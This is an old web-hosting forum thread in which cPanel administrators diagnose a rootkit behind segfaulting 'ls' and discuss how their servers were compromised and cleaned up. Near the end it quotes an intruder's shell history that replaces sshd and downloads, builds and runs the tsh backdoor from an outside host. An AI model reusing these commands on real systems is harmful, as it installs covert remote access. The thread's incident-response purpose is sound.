ls segmentation fault

[mitul]

Hello All,



I get "Segmentation Fault (Core Dumped)" when i execute "ls" command.
I re-installed fileutils from the panel and it Installed fileutils-4.1-10.1.

Then ls worked for me but after sometime it again fired the same error.

When i again re-installed fileutils it works for some time let's say 5 to 7 attempts i.e I can execute ls for 5 to 7 times and it works , but again the same problem.

This is has been a repeating prob for me, Any help would be Appreciated.

Help me Pls.

Thank you in Advanced.

I am on Redhat 7.3 and WHM/cPanel 6.0

Regards,

[infinityws]

I got the same problem. Anyone got a fix?

[vishal]

Hello,

This is a very serious problem!!! It simply means that ur server has been compromised somehow. ( I may be wrong!!!). But i am 90% sure it has been compromised.

get chkrootkit and see the results (be careful if it says that 'bindshell: INFECTED' (don't worry)

check the port and the service running on that port (might be portmap or portsentry) . if the only output from chkrootkit is 'bindshell : infected' then u might be safe.

check throughly the whole server!!!!

Be careful !!!!

Regards,

[Website Rob]

I would suggest you take the Server offline -- now.

I too, strongly believe your Server has been cracked. You can further verify by running 'netstat' -- if not found or also does a 'core dump' it's safe to say you have been hacked. The "Core Dump" msg. will appear on regular basis for certain commands, like; netstat, ps, top, df. Crackers use this command to remove traces of what they have been doing, although, they know the command to prevent it, because they've set it up that way.

It's a bummer and a big PITA, but there is no way around being absolutely sure, all traces have been removed, until the hard drive is re-formatted or looked at by someone experienced in this area. Every day you wait, you are giving someone else access to your Server to do... who knows what.


Just noticed the date of the first post.
Although this information is probably no good to them now, hopefully it will help others in the future -- whenever they see that dreaded msg: Core Dump, and wonder what it means.

[infinityws]

Yeah I was hacked. i'm beginning to hate Cpanel. Nothing but exploits and issues.

and yeah i was totally up to date on all software

[vishal]

Hello,

How did u come to know that u r hacked? is it a rootkit ??

Check this out??
http://www.soohrt.org
may be it will help u!!!


Let me know if u have any major probs may be i can help out!!!!

( i had been a victim )

Regards,

[sexy_guy]

Well i get core dump messages usually after the completion of /scripts/easyapache/ unless i restart apache /etc/rc.d/init.d/httpd restart. I suspect that because the final part of the installation attempts to restart apache but that doesnt work properly so unless you start apache manually immediately of the rebuild you will see segmentation and core dump error msgs. Pages of it. But i do not get these msgs with ls top netstat etc.

[Mon Apr 14 03:43:38 2003] [notice] child pid 10154 exit signal Segmentation fault (11)
[Mon Apr 14 03:43:39 2003] [notice] child pid 20098 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
[Mon Apr 14 03:43:39 2003] [notice] child pid 10155 exit signal Segmentation fault (11)
[Mon Apr 14 03:43:40 2003] [notice] child pid 20233 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
[Mon Apr 14 03:43:40 2003] [notice] child pid 20232 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
[Mon Apr 14 03:43:42 2003] [notice] child pid 20374 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
[Mon Apr 14 03:43:42 2003] [notice] child pid 26474 exit signal Segmentation fault (11)

[Radio_Head]

Originally posted by infinityws
Yeah I was hacked. i'm beginning to hate Cpanel. Nothing but exploits and issues.

and yeah i was totally up to date on all software

was you providing a Cpanel demo on yoru site ? If yes it was BAD ..
was you providing SSH ? If yes it was BAD ..
was php safe mode off ? If yes it was BAD ..

[infinityws]

Originally posted by Radio_Head
was you providing a Cpanel demo on yoru site ? If yes it was BAD ..
was you providing SSH ? If yes it was BAD ..
was php safe mode off ? If yes it was BAD ..

No Demo
SSH was activated on some accounts
whatever the default is for php safe mode that is what it is set to.

Anyhow the only accounts on the site were mine with a few SSH access.

[rnh]

Originally posted by infinityws
Anyhow the only accounts on the site were mine with a few SSH access.

As long as you have secure passwords (IE "E5d982kjhsGkjh9" as opposed to "password") the SSH shouldn't be a problem since you're the only person with access to the server.

However there are a few PHP scripts out there that have had vulnerabilities over the years so if you're using some outdated PHP scripts of some sort that could cause problems, especcially if you have php safe mode off (Cpanel's default)

If you don't know how they got in, you might want to do a grep through the PHP files for functions like "readfile", "passthrough", "fopen", "fwrite" and "fread" and other functions like that that could be used to access other files on your server if you do not know all of the PHP scripts that you have installed.

CGI files have been used to exploit servers as well with scripts that did not check user input and wrote to files and the user's input was changed to use the CGI files to write to passwd files to change passwords and add users and other things like that that they can do to gain access.

Also did you have Anonymous FTP enabled?

Otherwise it was probably just a vulnerability in some program, but cPanel seems to keep pretty up2date on patches and whatnot so I can't imagine that cPanel servers get r00ted that often on common software vulnerabilities.

[infinityws]

Well, about 2 weeks before today I went through all accounts and turned off anonymous FTP, as no one needed it.

But I believe they got in through the ptrace exploit. Apparently, .20 kernel upgrade doesn't give you any info as to wether the other patches were applied, so I had no idea. But I learn from my mistakes and i'll be sure to triple check that all patches have been installed.

But I've read of many cpanel exploits, its just my first time with a server using cpanel and in less than a month its been compromised. Never happened before.

[parhelic]

We had 7 of our Cpanel boxes exploited this week, apparently they used a Remote unix shell backdoor like this one:

http://packetstormsecurity.nl/groups...bindshell-unix

[rnh]

Man... sorry to hear about your misfortune.

Was this done from a remote server and not by SSH enabled users on your own server?

Man, glad I switched to FreeBSD... atleast for now I am...

What version of Linux were you running? Was it up to date?

[rnh]

I take that back... looking at that file again the person has to have SSH access initially in order to execute that file, which opens port 60000 for them to access with elevated priveldges...

Did the script bypass a firewall closing off all unused ports or did you not have a firewall?

[parhelic]

It probably was a local user, and its been a nightmare for the past week trying to clean this mofo out. Here's some of what he did from .bash_history once he rooted us:

941 wget ftp://rt.fm/pub/OpenBSD/OpenSSH/port...3.6.1p1.tar.gz
942 tar zxvf openssh-3.6.1p1.tar.gz
943 cd openssh-3.6.1p1
944 ls
945 ./configure --prefix=/usr --sysconfdir=/etc/ssh/ --with-tcp-wrappers
946 make
947 ls
948 rm /usr/sbin/sshd
949 make install
950 cd ..
951 ls
952 wget http://www.cr0.net:8040/code/network/tsh-0.52.tar.gz
953 wget http://www.cr0.net:8040/code/network/tsh-0.42.tar.gz
954 ls
955 rm tsh-0.52.tar.gz
956 tar zxvf tsh-0.42.tar.gz
957 cd tsh-0.42
958 ls
959 make linux
960 ls
961 ./tshd

This is what happened last night, previously in the week we thought we had him taken care of, we blocked his subnet at our router, we removed his Ambient's rootkit (ARK), removed his /home/user accounts and his entries in /etc/passwd, /etc/shadow, and /etc/group. Following that we edited /etc/passwd and switched everyone on all of our servers from/bin/bash to /usr/local/cpanel/bin/jailshell, we removed all of the /root/.ssh keys as well. Apparently we didnt clean him out completely

All of the servers which were hacked were running latest build of Cpanel, they were all completely up2date, running Redhat 8.0 with latest stable kernel 2.4.18-27.8.0.

*sigh*